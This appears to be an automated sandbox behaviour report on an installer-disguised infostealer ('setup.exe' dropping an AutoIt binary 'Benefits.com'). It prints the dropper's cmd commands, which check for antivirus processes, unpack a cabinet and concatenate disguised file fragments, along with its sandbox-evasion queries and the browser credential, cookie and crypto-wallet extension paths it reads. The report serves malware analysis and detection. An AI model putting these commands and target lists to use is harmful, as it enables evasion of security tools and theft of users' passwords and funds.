      Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: iconcodecservice.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: setup.exeStatic file information: File size 83896395 > 1048576
      Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC

      Persistence and Installation Behavior

      barindex
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\224177\Benefits.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\224177\Benefits.comJump to dropped file
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.com TID: 8064Thread sleep time: -90000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\224177Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\224177\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 224177Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E WellingtonJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tranny" Yale Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 224177\Benefits.com + Photographer + Vacuum + Separate + Valium + Continuing + Training + Hours + Kissing + Accepts + Verde + Quotations 224177\Benefits.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Searches + ..\Coordinated + ..\Students + ..\Approve + ..\There + ..\Molecular + ..\Updated yJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\224177\Benefits.com Benefits.com yJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: Benefits.com, 0000000C.00000000.1733294536.0000000001033000.00000002.00000001.01000000.00000008.sdmp, Benefits.com.1.dr, Accepts.8.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
